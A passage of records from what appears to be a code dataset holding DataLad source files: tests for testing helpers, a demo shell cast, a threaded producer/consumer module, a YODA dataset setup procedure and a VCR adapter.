None)\n\n\n@known_failure_githubci_win\ndef test_without_http_proxy():\n\n @without_http_proxy\n def check(a, kw=False):\n assert_false('http_proxy' in os.environ)\n assert_false('https_proxy' in os.environ)\n assert_in(kw, [False, 'custom'])\n\n check(1)\n\n with patch.dict('os.environ', {'http_proxy': 'http://127.0.0.1:9/'}):\n check(1)\n check(1, \"custom\")\n with assert_raises(AssertionError):\n check(1, \"wrong\")\n\n with patch.dict('os.environ', {'https_proxy': 'http://127.0.0.1:9/'}):\n check(1)\n with patch.dict('os.environ', {'http_proxy': 'http://127.0.0.1:9/',\n 'https_proxy': 'http://127.0.0.1:9/'}):\n check(1)\n\n\ndef test_assert_re_in():\n assert_re_in(\".*\", \"\")\n assert_re_in(\".*\", [\"any\"])\n\n # should do match not search\n assert_re_in(\"ab\", \"abc\")\n assert_raises(AssertionError, assert_re_in, \"ab\", \"cab\")\n assert_raises(AssertionError, assert_re_in, \"ab$\", \"abc\")\n\n # Sufficient to have one entry matching\n assert_re_in(\"ab\", [\"\", \"abc\", \"laskdjf\"])\n assert_raises(AssertionError, assert_re_in, \"ab$\", [\"ddd\", \"\"])\n\n # Tuples should be ok too\n assert_re_in(\"ab\", (\"\", \"abc\", \"laskdjf\"))\n assert_raises(AssertionError, assert_re_in, \"ab$\", (\"ddd\", \"\"))\n\n # shouldn't \"match\" the empty list\n assert_raises(AssertionError, assert_re_in, \"\", [])\n\n\ndef test_skip_if_no_network():\n cleaned_env = os.environ.copy()\n cleaned_env.pop('DATALAD_TESTS_NONETWORK', None)\n # we need to run under cleaned env to make sure we actually test in both conditions\n with patch('os.environ', cleaned_env):\n @skip_if_no_network\n def somefunc(a1):\n return a1\n #ok_(hasattr(somefunc, \"network\"))\n with patch_config({'datalad.tests.nonetwork': '1'}):\n assert_raises(Skipped, somefunc, 1)\n with patch.dict('os.environ', {}):\n eq_(somefunc(1), 1)\n # and now if used as a function, not a decorator\n with patch_config({'datalad.tests.nonetwork': '1'}):\n assert_raises(Skipped, skip_if_no_network)\n with patch.dict('os.environ', {}):\n eq_(skip_if_no_network(), None)\n\n\ndef test_skip_if_no_module():\n\n def testish():\n skip_if_no_module(\"nonexistingforsuremodule\")\n raise ValueError\n assert_raises(Skipped, testish)\n\n def testish2():\n skip_if_no_module(\"datalad\")\n return \"magic\"\n eq_(testish2(), \"magic\")\n\n\ndef test_skip_if():\n\n with assert_raises(Skipped):\n @skip_if(True)\n def f(): # pragma: no cover\n raise AssertionError(\"must have not been ran\")\n f()\n\n @skip_if(False)\n def f():\n return \"magical\"\n eq_(f(), 'magical')\n\n\n@assert_cwd_unchanged\n@with_tempfile(mkdir=True)\ndef test_run_under_dir(d=None):\n orig_pwd = getpwd()\n orig_cwd = os.getcwd()\n\n @run_under_dir(d)\n def f(arg, kwarg=None):\n eq_(arg, 1)\n eq_(kwarg, 2)\n eq_(getpwd(), d)\n\n f(1, 2)\n eq_(getpwd(), orig_pwd)\n eq_(os.getcwd(), orig_cwd)\n\n # and if fails\n assert_raises(AssertionError, f, 1, 3)\n eq_(getpwd(), orig_pwd)\n eq_(os.getcwd(), orig_cwd)\n\n\ndef test_assert_dict_equal():\n assert_dict_equal({}, {})\n assert_dict_equal({\"a\": 3}, {\"a\": 3})\n assert_raises(AssertionError, assert_dict_equal, {1: 3}, {1: 4})\n assert_raises(AssertionError, assert_dict_equal, {1: 3}, {2: 4})\n assert_raises(AssertionError, assert_dict_equal, {1: 3}, {2: 4, 1: 3})\n assert_raises(AssertionError, assert_dict_equal, {1: 3}, {2: 4, 1: 'a'})\n try:\n import numpy as np\n except: # pragma: no cover\n pytest.skip(\"need numpy for this tiny one\")\n # one is scalar another one array\n assert_raises(AssertionError, assert_dict_equal, {1: 0}, {1: np.arange(1)})\n assert_raises(AssertionError, assert_dict_equal, {1: 0}, {1: np.arange(3)})\n\n\ndef test_assert_str_equal():\n assert_str_equal(\"a\", \"a\")\n assert_str_equal(\"a\\n\", \"a\\n\")\n assert_str_equal(\"a\\nb\", \"a\\nb\")\n assert_raises(AssertionError, assert_str_equal, \"a\", \"a\\n\")\n assert_raises(AssertionError, assert_str_equal, \"a\", \"b\")\n assert_raises(AssertionError, assert_str_equal, \"ab\", \"b\")\n\n\ndef test_testsui():\n # just one for now to test conflicting arguments\n with assert_raises(ValueError):\n @with_testsui(responses='some', interactive=False)\n def some_func(): # pragma: no cover\n pass\n\n from datalad.ui import ui\n\n @with_testsui(responses=['yes', \"maybe so\"])\n def func2(x):\n assert x == 1\n eq_(ui.yesno(\"title\"), True)\n eq_(ui.question(\"title2\"), \"maybe so\")\n assert_raises(AssertionError, ui.question, \"asking more than we know\")\n return x*2\n eq_(func2(1), 2)\n\n @with_testsui(interactive=False)\n def func3(x):\n assert_false(ui.is_interactive)\n return x*3\n eq_(func3(2), 6)\n\n\ndef test_setup():\n # just verify that we monkey patched consts correctly\n from datalad.consts import DATASETS_TOPURL\n eq_(DATASETS_TOPURL, 'https://datasets-tests.datalad.org/')\n from datalad.tests.utils_pytest import get_datasets_topdir\n eq_(get_datasets_topdir(), 'datasets-tests.datalad.org')\n\n\ndef test_skip_ssh():\n with patch_config({'datalad.tests.ssh': False}):\n with assert_raises(Skipped):\n skip_ssh(lambda: False)()\n\n\ndef test_probe_known_failure():\n # should raise assert error if function no longer fails\n with patch_config({'datalad.tests.knownfailures.probe': True}):\n with assert_raises(Failed):\n probe_known_failure(lambda: True)()\n\n with patch_config({'datalad.tests.knownfailures.probe': False}):\n ok_(probe_known_failure(lambda: True))\n\n\ndef test_ignore_nose_capturing_stdout():\n # Just test the logic, not really a situation under overwritten stdout\n def raise_exc():\n raise AttributeError('nose causes a message which includes words '\n 'StringIO and fileno')\n with assert_raises(AttributeError):\n ignore_nose_capturing_stdout(raise_exc)()\n\n\n@skip_wo_symlink_capability\n@with_tree(tree={'ingit': '', 'staged': 'staged', 'notingit': ''})\ndef test_ok_file_under_git_symlinks(path=None):\n # Test that works correctly under symlinked path\n orepo = GitRepo(path)\n orepo.add('ingit')\n orepo.commit('msg')\n orepo.add('staged')\n lpath = path + \"-symlink\" # will also be removed AFAIK by our tempfile handling\n Path(lpath).symlink_to(Path(path))\n ok_symlink(lpath)\n ok_file_under_git(op.join(path, 'ingit'))\n ok_file_under_git(op.join(lpath, 'ingit'))\n ok_file_under_git(op.join(lpath, 'staged'))\n with assert_raises(AssertionError):\n ok_file_under_git(op.join(lpath, 'notingit'))\n with assert_raises(AssertionError):\n ok_file_under_git(op.join(lpath, 'nonexisting'))\n\n\ndef test_assert_raises():\n # rudimentary test of assert_raises shim prompted by suspicion in\n # https://github.com/datalad/datalad/issues/6846#issuecomment-1363878497\n def raise_ValueError():\n raise ValueError(\"exc ValueError\")\n\n def raise_TypeError():\n raise TypeError(\"exc TypeError\")\n\n # Test both forms of use\n with assert_raises(ValueError):\n raise_ValueError()\n assert_raises(ValueError, raise_ValueError)\n\n # can we specify multiple in a tuple?\n with assert_raises((ValueError, TypeError)):\n raise_ValueError()\n with assert_raises((ValueError, TypeError)):\n raise_TypeError()\n\n assert_raises((ValueError, TypeError), raise_TypeError)\n assert_raises((ValueError, TypeError), raise_ValueError)" }, { "alpha_fraction": 0.7448275685310364, "alphanum_fraction": 0.751724123954773, "avg_line_length": 81.85713958740234, "blob_id": "db90f43f28c2bb8c4cc8d7f27b28824b62f9e94b", "content_id": "457892a9125b73b405e1ad0a9f3a951149d81516", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 580, "license_type": "permissive", "max_line_length": 151, "num_lines": 7, "path": "/docs/casts/cmdline_basic_usage.sh", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "say \"All of DataLad's functionality is available through a single command: \\`datalad\\`\"\nsay \"Running the datalad command without any arguments, gives a summary of basic options, and a list of available sub-commands.\"\nrun \"datalad\"\nsay \"More comprehensive information is available via the --help long-option (we will truncate the output here)\"\nrun \"datalad --help | head -n10\"\nsay \"Getting information on any of the available sub commands works in the same way -- just pass --help AFTER the sub-command (output again truncated)\"\nrun \"datalad create --help | head -n20\"\n" }, { "alpha_fraction": 0.5576846599578857, "alphanum_fraction": 0.5595929026603699, "avg_line_length": 42.443870544433594, "blob_id": "10355087bdafbebb39889189f097cec2635cbcdd", "content_id": "13004d542129e4a1949540b1d7fd21de2fc97a24", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 25154, "license_type": "permissive", "max_line_length": 119, "num_lines": 579, "path": "/datalad/support/parallel.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Helpers for parallel execution\n\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nimport concurrent.futures\nimport inspect\nimport sys\nimport time\nimport uuid\n\nfrom collections import defaultdict\nfrom queue import Queue, Empty\nfrom threading import Thread\n\nfrom . import ansi_colors as colors\nfrom ..log import log_progress\nfrom ..utils import path_is_subpath\nfrom datalad.support.exceptions import CapturedException\n\nimport logging\nlgr = logging.getLogger('datalad.parallel')\n\n\ndef _count_str(count, verb, omg=False):\n if count:\n msg = \"{:d} {}\".format(count, verb)\n if omg:\n msg = colors.color_word(msg, colors.RED)\n return msg\n\n\n#\n# safe_to_consume helpers\n#\n\ndef no_parentds_in_futures(futures, path, skip=tuple()):\n \"\"\"Return True if no path in futures keys is parentds for provided path\n\n Assumes that the future's key is the path.\n\n Parameters\n ----------\n skip: iterable\n Do not consider futures with paths in skip. E.g. it could be top level\n dataset which we know it exists already, and it is ok to start with child\n process before it\n \"\"\"\n # TODO: OPT. Could benefit from smarter than linear time if not one at a time?\n # or may be we should only go through active futures (still linear!)?\n return all(not path_is_subpath(path, p) or p in skip for p in futures)\n\n\ndef no_subds_in_futures(futures, path, skip=tuple()):\n \"\"\"Return True if no path in futures keys is a subdataset for provided path\n\n See `no_parentds_in_futures` for more info\n \"\"\"\n return all(not path_is_subpath(p, path) or p in skip for p in futures)\n\n\nclass ProducerConsumer:\n \"\"\"Producer/Consumer implementation to (possibly) parallelize execution.\n\n It is an iterable providing a multi-threaded producer/consumer implementation,\n where there could be multiple consumers for items produced by a producer. Since\n in DataLad majority of time is done in IO interactions with outside git and git-annex\n processes, and since we typically operate across multiple datasets, multi-threading\n across datasets operations already provides a significant performance benefit.\n\n All results from consumers are all yielded as soon as they are produced by consumers.\n Because this implementation is based on threads, `producer` and `consumer` could\n be some \"closures\" within code, thus having lean interface and accessing\n data from shared \"outer scope\".\n\n Notes\n -----\n - with jobs > 1, results are yielded as soon as available, so order\n might not match the one provided by \"producer\".\n - jobs > 1, is \"effective\" only for Python >= 3.8. For older versions it\n would log a warning (upon initial encounter) if jobs > 1 is specified.\n - `producer` must produce unique entries. AssertionError might be raised if\n the same entry is to be consumed.\n - `consumer` can add to the queue of items produced by producer via\n `.add_to_producer_queue`. This allows for continuous re-use of the same\n instance in recursive operations (see `get` use of ProducerConsumer).\n - if producer or consumer raise an exception, we will try to \"fail gracefully\",\n unless subsequent Ctrl-C is pressed, we will let already running jobs to\n finish first.\n\n Examples\n --------\n A simple and somewhat boring example could be to count lines in '*.py'\n files in parallel\n\n from glob import glob\n from pprint import pprint\n from datalad.support.parallel import ProducerConsumer\n\n def count_lines(fname):\n with open(fname) as f:\n return fname, len(f.readlines())\n pprint(dict(ProducerConsumer(glob(\"*.py\"), count_lines)))\n\n More usage examples could be found in `test_parallel.py` and around the\n codebase `addurls.py`, `get.py`, `save.py`, etc.\n \"\"\"\n\n # Users should not specify -J100 and then just come complaining without\n # being informed that they are out of luck\n _alerted_already = False\n\n def __init__(self,\n producer, consumer,\n *,\n jobs=None,\n safe_to_consume=None,\n producer_future_key=None,\n reraise_immediately=False,\n agg=None,\n ):\n \"\"\"\n\n Parameters\n ----------\n producer: iterable\n Provides items to feed a consumer with\n consumer: callable\n Is provided with items produced by producer. Multiple consumers might\n operate in parallel threads if jobs > 1\n jobs: int, optional\n If None or \"auto\", 'datalad.runtime.max-jobs' configuration variable is\n consulted. With jobs=0 there is no threaded execution whatsoever. With\n jobs=1 there is a separate thread for the producer, so in effect with jobs=1\n some parallelization between producer (if it is a generator) and consumer\n could be achieved, while there is only a single thread available for consumers.\n safe_to_consume: callable, optional\n A callable which gets a dict of all known futures and current item from producer.\n It should return `True` if executor can proceed with current value from producer.\n If not (unsafe to consume) - we will wait.\n WARNING: outside code should make sure about provider and `safe_to_consume` to\n play nicely or a very suboptimal behavior or possibly even a deadlock can happen.\n producer_future_key: callable, optional\n A key function for a value from producer which will be used as a key in futures\n dictionary and output of which is passed to safe_to_consume.\n reraise_immediately: bool, optional\n If True, it would stop producer yielding values as soon as it detects that some\n exception has occurred (although there might still be values in the queue to be yielded\n which were collected before the exception was raised).\n agg: callable, optional\n Should be a callable with two arguments: (item, prior total) and return a new total\n which will get assigned to .total of this object. If not specified, .total is\n just a number of items produced by the producer.\n \"\"\"\n self.producer = producer\n self.consumer = consumer\n self.jobs = jobs\n self.safe_to_consume = safe_to_consume\n self.producer_future_key = producer_future_key\n self.reraise_immediately = reraise_immediately\n self.agg = agg\n\n self.total = None if self.agg else 0\n self._jobs = None # actual \"parallel\" jobs used\n # Relevant only for _iter_threads\n self._producer_finished = None\n self._producer_queue = None\n self._producer_exception = None\n self._producer_interrupt = None\n # so we could interrupt more or less gracefully\n self._producer_thread = None\n self._executor = None\n self._futures = {}\n self._interrupted = False\n\n @property\n def interrupted(self):\n return self._interrupted\n\n def __del__(self):\n # if we are killed while executing, we should ask executor to shutdown\n shutdown = getattr(self, \"shutdown\", None)\n if shutdown:\n shutdown(force=True)\n\n def shutdown(self, force=False, exception=None):\n if self._producer_thread and self._producer_thread.is_alive():\n # we will try to let the worker to finish \"gracefully\"\n self._producer_interrupt = f\"shutdown due to {exception}\"\n\n # purge producer queue\n if self._producer_queue:\n while not self._producer_queue.empty():\n self._producer_queue.get()\n\n lgr.debug(\"Shutting down %s with %d futures. Reason: %s\",\n self._executor, len(self._futures), exception)\n\n if not force:\n # pop not yet running or done futures.\n # Those would still have a chance to yield results and finish gracefully\n # or their exceptions to be bubbled up FWIW.\n ntotal = len(self._futures)\n ncanceled = 0\n nrunning = 0\n # Do in reverse order so if any job still manages\n # to sneak in, it would be the earlier submitted one.\n for k, future in list(self._futures.items())[::-1]:\n running = future.running()\n nrunning += int(running)\n if not (running or future.done()):\n if self._futures.pop(k).cancel():\n ncanceled += 1\n lgr.info(\"Canceled %d out of %d jobs. %d left running.\",\n ncanceled, ntotal, nrunning)\n else:\n # just pop all entirely\n for k in list(self._futures)[::-1]:\n self._futures.pop(k).cancel()\n if self._executor:\n self._executor.shutdown()\n self._executor = None\n if exception:\n raise exception\n lgr.debug(\"Finished shutdown with force=%s due to exception=%r\", force, exception)\n\n def _update_total(self, value):\n if self.agg:\n self.total = (\n self.agg(value, self.total) if self.total is not None else self.agg(value)\n )\n else:\n self.total += 1\n\n @classmethod\n def get_effective_jobs(cls, jobs):\n \"\"\"Return actual number of jobs to be used.\n\n It will account for configuration variable ('datalad.runtime.max-jobs') and possible\n other requirements (such as version of Python).\n \"\"\"\n if jobs in (None, \"auto\"):\n from datalad import cfg\n # ATM there is no \"auto\" for this operation, so in both auto and None\n # just consult max-jobs which can only be an int ATM.\n # \"auto\" could be for some auto-scaling based on a single future time\n # to complete, scaling up/down. Ten config variable could accept \"auto\" as well\n jobs = cfg.obtain('datalad.runtime.max-jobs')\n return jobs\n\n def __iter__(self):\n self._jobs = self.get_effective_jobs(self.jobs)\n if self._jobs == 0:\n yield from self._iter_serial()\n else:\n yield from self._iter_threads(self._jobs)\n\n def _iter_serial(self):\n # depchecker is not consulted, serial execution\n # reraise_immediately is also \"always False by design\"\n # To allow consumer to add to the queue\n self._producer_queue = producer_queue = Queue()\n\n def produce():\n # First consume all coming directly from producer and then go through all which\n # consumer might have added to the producer queue\n for args in self._producer_iter:\n self._update_total(args)\n yield args\n # consumer could have added to the queue while we were still\n # producing\n while not producer_queue.empty():\n yield producer_queue.get()\n\n for args in produce():\n res = self.consumer(args)\n if inspect.isgenerator(res):\n lgr.debug(\"Got consumer worker which returned a generator %s\", res)\n yield from res\n else:\n lgr.debug(\"Got straight result %s, not a generator\", res)\n yield res\n\n @property\n def _producer_iter(self):\n \"\"\"A little helper to also support generator functions\"\"\"\n return self.producer() if inspect.isgeneratorfunction(self.producer) else self.producer\n\n def _iter_threads(self, jobs):\n self._interrupted = False\n self._producer_finished = False\n self._producer_exception = None\n self._producer_interrupt = None\n\n # To allow feeding producer queue with more entries, possibly from consumer!\n self._producer_queue = producer_queue = Queue()\n consumer_queue = Queue()\n\n def producer_worker():\n \"\"\"That is the one which interrogates producer and updates .total\"\"\"\n try:\n for value in self._producer_iter:\n if self._producer_interrupt:\n raise InterruptedError(\"Producer thread was interrupted due to %s\" % self._producer_interrupt)\n self.add_to_producer_queue(value)\n except InterruptedError:\n pass # There is some outside exception which will be raised\n except BaseException as e:\n self._producer_exception = e\n finally:\n self._producer_finished = True\n\n def consumer_worker(callable, *args, **kwargs):\n \"\"\"Since jobs could return a generator and we cannot really \"inspect\" for that\n \"\"\"\n res = callable(*args, **kwargs)\n if inspect.isgenerator(res):\n lgr.debug(\"Got consumer worker which returned a generator %s\", res)\n didgood = False\n for r in res:\n didgood = True\n lgr.debug(\"Adding %s to queue\", r)\n consumer_queue.put(r)\n if not didgood:\n lgr.error(\"Nothing was obtained from %s :-(\", res)\n else:\n lgr.debug(\"Got straight result %s, not a generator\", res)\n consumer_queue.put(res)\n\n self._producer_thread = Thread(target=producer_worker)\n self._producer_thread.start()\n self._futures = futures = {}\n\n lgr.debug(\"Initiating ThreadPoolExecutor with %d jobs\", jobs)\n # we will increase sleep_time when doing nothing useful\n sleeper = Sleeper()\n interrupted_by_exception = None\n with concurrent.futures.ThreadPoolExecutor(jobs) as executor:\n self._executor = executor\n # yield from the producer_queue (.total and .finished could be accessed meanwhile)\n while True:\n try:\n done_useful = False\n if self.reraise_immediately and self._producer_exception and not interrupted_by_exception:\n # so we have a chance to exit gracefully\n # No point to reraise if there is already an exception which was raised\n # which might have even been this one\n lgr.debug(\"Reraising an exception from producer as soon as we found it\")\n raise self._producer_exception\n if (self._producer_finished and\n not futures and\n consumer_queue.empty() and\n producer_queue.empty()):\n # This will let us not \"escape\" the while loop and reraise any possible exception\n # within the loop if we have any.\n # Otherwise we might see \"RuntimeError: generator ignored GeneratorExit\"\n # when e.g. we did continue upon interrupted_by_exception, and then\n # no other subsequent exception was raised and we left the loop\n raise _FinalShutdown()\n\n # important! We are using threads, so worker threads will be sharing CPU time\n # with this master thread. For it to become efficient, we should consume as much\n # as possible from producer asap and push it to executor. So drain the queue\n while not (producer_queue.empty() or interrupted_by_exception):\n done_useful = True\n try:\n job_args = producer_queue.get() # timeout=0.001)\n job_key = self.producer_future_key(job_args) if self.producer_future_key else job_args\n if self.safe_to_consume:\n # Sleep a little if we are not yet ready\n # TODO: add some .debug level reporting based on elapsed time\n # IIRC I did smth like growing exponentially delays somewhere (dandi?)\n while not self.safe_to_consume(futures, job_key):\n self._pop_done_futures(lgr) or sleeper()\n # Current implementation, to provide depchecking, relies on unique\n # args for the job\n assert job_key not in futures\n lgr.debug(\"Submitting worker future for %s\", job_args)\n futures[job_key] = executor.submit(consumer_worker, self.consumer, job_args)\n except Empty:\n pass\n\n # check active futures\n if not consumer_queue.empty():\n done_useful = True\n # ATM we do not bother of some \"in order\" reporting\n # Just report as soon as any new record arrives\n res = consumer_queue.get()\n lgr.debug(\"Got %s from consumer_queue\", res)\n yield res\n\n done_useful |= self._pop_done_futures(lgr)\n\n if not done_useful: # you need some rest\n # TODO: same here -- progressive logging\n lgr.log(5,\n \"Did nothing useful, sleeping. Have \"\n \"producer_finished=%s producer_queue.empty=%s futures=%s consumer_queue.empty=%s\",\n self._producer_finished,\n producer_queue.empty(),\n futures,\n consumer_queue.empty(),\n )\n sleeper()\n else:\n sleeper.reset()\n except (_FinalShutdown, GeneratorExit):\n self.shutdown(force=True, exception=self._producer_exception or interrupted_by_exception)\n break # if there were no exception to raise\n except BaseException as exc:\n ce = CapturedException(exc)\n self._interrupted = True\n if interrupted_by_exception:\n # so we are here again but now it depends why we are here\n if isinstance(exc, KeyboardInterrupt):\n lgr.warning(\"Interrupted via Ctrl-C. Forcing the exit\")\n self.shutdown(force=True, exception=exc)\n else:\n lgr.warning(\n \"One more exception was received while \"\n \"trying to finish gracefully: %s\",\n ce)\n # and we go back into the loop until we finish or there is Ctrl-C\n else:\n interrupted_by_exception = exc\n lgr.warning(\n \"Received an exception %s. Canceling not-yet \"\n \"running jobs and waiting for completion of \"\n \"running. You can force earlier forceful exit \"\n \"by Ctrl-C.\", ce)\n self.shutdown(force=False, exception=exc)\n\n def add_to_producer_queue(self, value):\n self._producer_queue.put(value)\n self._update_total(value)\n\n def _pop_done_futures(self, lgr):\n \"\"\"Removes .done from provided futures.\n\n Returns\n -------\n bool\n True if any future was removed\n \"\"\"\n done_useful = False\n # remove futures which are done\n for args, future in list(self._futures.items()):\n if future.done():\n done_useful = True\n future_ = self._futures.pop(args)\n exception = future_.exception()\n if exception:\n lgr.debug(\"Future for %r raised %s. Re-raising to trigger graceful shutdown etc\", args, exception)\n raise exception\n lgr.debug(\"Future for %r is done\", args)\n return done_useful\n\n\nclass Sleeper():\n def __init__(self):\n self.min_sleep_time = 0.001\n # but no more than to this max\n self.max_sleep_time = 0.1\n self.sleep_time = self.min_sleep_time\n\n def __call__(self):\n time.sleep(self.sleep_time)\n self.sleep_time = min(self.max_sleep_time, self.sleep_time * 2)\n\n def reset(self):\n self.sleep_time = self.min_sleep_time\n\n\nclass ProducerConsumerProgressLog(ProducerConsumer):\n \"\"\"ProducerConsumer wrapper with log_progress reporting.\n\n It is to be used around a `consumer` which returns or yields result records.\n If that is not the case -- use regular `ProducerConsumer`.\n\n It will update `.total` of the `log_progress` each time it changes (i.e. whenever\n producer produced new values to be consumed).\n \"\"\"\n\n def __init__(self,\n producer, consumer,\n *,\n log_filter=None,\n label=\"Total\", unit=\"items\",\n lgr=None,\n **kwargs\n ):\n \"\"\"\n Parameters\n ----------\n producer, consumer, **kwargs\n Passed into ProducerConsumer. Most likely kwargs must not include 'agg' or\n if provided, it must return an 'int' value.\n log_filter: callable, optional\n If defined, only result records for which callable evaluates to True will be\n passed to log_progress\n label, unit: str, optional\n Provided to log_progress\n lgr: logger, optional\n Provided to log_progress. Local one is used if not provided\n \"\"\"\n super().__init__(producer, consumer, **kwargs)\n self.log_filter = log_filter\n self.label = label\n self.unit = unit\n self.lgr = lgr\n\n def __iter__(self):\n pid = str(uuid.uuid4()) # could be based on PID and time may be to be informative?\n lgr_ = self.lgr\n label = self.label\n if lgr_ is None:\n lgr_ = lgr\n\n log_progress(lgr_.info, pid,\n \"%s: starting\", self.label,\n # will become known only later total=len(items),\n label=self.label, unit=\" \" + self.unit,\n noninteractive_level=5)\n counts = defaultdict(int)\n total_announced = None # self.total\n for res in super().__iter__():\n if self.total and total_announced != self.total:\n # update total with new information\n log_progress(\n lgr_.info,\n pid,\n \"\", # None flips python 3.6.7 in conda if nose ran without -s\n # I do not think there is something\n # valuable to announce\n total=self.total,\n # unfortunately of no effect, so we cannot inform that more items to come\n # unit=(\"+\" if not it.finished else \"\") + \" \" + unit,\n update=0, # not None, so it does not stop\n noninteractive_level=5\n )\n total_announced = self.total\n\n if not (self.log_filter and not self.log_filter(res)):\n counts[res[\"status\"]] += 1\n count_strs = [_count_str(*args)\n for args in [(counts[\"notneeded\"], \"skipped\", False),\n (counts[\"error\"], \"failed\", True)]]\n if counts[\"notneeded\"] or counts[\"error\"] or self.interrupted:\n strs = count_strs\n if self.interrupted:\n strs.append(\"exiting!\")\n label = \"{} ({})\".format(\n self.label,\n \", \".join(filter(None, count_strs)))\n\n log_progress(\n lgr_.error if res[\"status\"] == \"error\" else lgr_.info,\n pid,\n \"%s: processed result%s\", self.label,\n \" for \" + res[\"path\"] if \"path\" in res else \"\",\n label=label, update=1, increment=True,\n noninteractive_level=5)\n yield res\n log_progress(lgr_.info, pid, \"%s: done\", self.label,\n noninteractive_level=5)\n\n\nclass _FinalShutdown(Exception):\n \"\"\"Used internally for the final forceful shutdown if any exception did happen\"\"\"\n pass\n" }, { "alpha_fraction": 0.6309260129928589, "alphanum_fraction": 0.6318121552467346, "avg_line_length": 23.532608032226562, "blob_id": "453a5e8541a8847f5c42965a094ea7d8bc41d975", "content_id": "19fd5e48366336e9b20d739a1a84509d73ea9342", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2257, "license_type": "permissive", "max_line_length": 76, "num_lines": 92, "path": "/datalad/resources/procedures/cfg_yoda.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\"\"\"Procedure to apply YODA-compatible default setup to a dataset\n\nThis procedure assumes a clean dataset that was just created by\n`datalad create`.\n\"\"\"\n\nimport sys\nimport os.path as op\n\nfrom datalad.distribution.dataset import require_dataset\nfrom datalad.utils import create_tree\n\nds = require_dataset(\n sys.argv[1],\n check_installed=True,\n purpose='YODA dataset setup')\n\nto_modify = [\n ds.pathobj / 'code' / 'README.md',\n ds.pathobj / 'code' / '.gitattributes',\n ds.pathobj / 'README.md',\n ds.pathobj / 'CHANGELOG.md',\n ds.pathobj / '.gitattributes',\n]\n\ndirty = [\n s for s in ds.status(\n to_modify,\n result_renderer='disabled',\n return_type='generator',\n )\n if s['state'] != 'clean'\n]\n\nif dirty:\n raise RuntimeError(\n 'Stopping, because to be modified dataset '\n 'content was found dirty: {}'.format(\n [s['path'] for s in dirty]\n ))\n\nREADME_code = \"\"\"\\\nAll custom code goes into this directory. All scripts should be written such\nthat they can be executed from the root of the dataset, and are only using\nrelative paths for portability.\n\"\"\"\n\nREADME_top = \"\"\"\\\n# Project <insert name>\n\n## Dataset structure\n\n- All inputs (i.e. building blocks from other sources) are located in\n `inputs/`.\n- All custom code is located in `code/`.\n\"\"\"\n\ntmpl = {\n 'code': {\n 'README.md': README_code,\n },\n 'README.md': README_top,\n 'CHANGELOG.md': '', # TODO\n}\n\n# unless taken care of by the template already, each item in here\n# will get its own .gitattributes entry to keep it out of the annex\n# give relative path to dataset root (use platform notation)\nforce_in_git = [\n 'README.md',\n 'CHANGELOG.md',\n]\n\n###################################################################\n# actually dump everything into the dataset\ncreate_tree(ds.path, tmpl)\n\n# all code goes into Git\nds.repo.set_gitattributes([('*', {'annex.largefiles': 'nothing'})],\n op.join('code', '.gitattributes'))\n\n# amend gitattributes\nds.repo.set_gitattributes(\n [(p, {'annex.largefiles': 'nothing'}) for p in force_in_git])\n\n# leave clean\nds.save(\n path=to_modify,\n message=\"Apply YODA dataset setup\",\n result_renderer='disabled'\n)\n" }, { "alpha_fraction": 0.6114524602890015, "alphanum_fraction": 0.6146473288536072, "avg_line_length": 37.75238037109375, "blob_id": "94c583a1ff38f3631f6512d0d493fb820ed210cc", "content_id": "129d833c5a8290ca5fe037f0abdccada9d5394f7", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4069, "license_type": "permissive", "max_line_length": 112, "num_lines": 105, "path": "/datalad/support/vcr_.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Adapters and decorators for vcr\n\"\"\"\n\nimport logging\n\nfrom functools import wraps\nfrom os.path import isabs\nfrom contextlib import contextmanager\n\nfrom datalad.utils import Path\nfrom datalad.support.exceptions import CapturedException\n\nlgr = logging.getLogger(\"datalad.support.vcr\")\n\n\ndef _get_cassette_path(path):\n \"\"\"Return a path to the cassette within our unified 'storage'\"\"\"\n if not isabs(path): # so it was given as a name\n return \"fixtures/vcr_cassettes/%s.yaml\" % path\n return path\n\ntry:\n # TEMP: Just to overcome problem with testing on jessie with older requests\n # https://github.com/kevin1024/vcrpy/issues/215\n import vcr.patch as _vcrp\n import requests as _\n try:\n from requests.packages.urllib3.connectionpool import HTTPConnection as _a, VerifiedHTTPSConnection as _b\n except ImportError:\n def returnnothing(*args, **kwargs):\n return()\n _vcrp.CassettePatcherBuilder._requests = returnnothing\n\n from vcr import use_cassette as _use_cassette, VCR as _VCR\n\n def use_cassette(path, return_body=None, skip_if_no_vcr=False, **kwargs):\n \"\"\"Adapter so we could create/use custom use_cassette with custom parameters\n\n Parameters\n ----------\n path : str\n If not absolute path, treated as a name for a cassette under fixtures/vcr_cassettes/\n skip_if_no_vcr : bool\n Rather than running without VCR it would throw unittest.SkipTest\n exception. Of effect only if vcr import fails (so not in this\n implementation but the one below)\n \"\"\"\n path = _get_cassette_path(path)\n lgr.debug(\"Using cassette %s\", path)\n if return_body is not None:\n my_vcr = _VCR(\n before_record_response=lambda r: dict(r, body={'string': return_body.encode()}))\n return my_vcr.use_cassette(path, **kwargs) # with a custom response\n 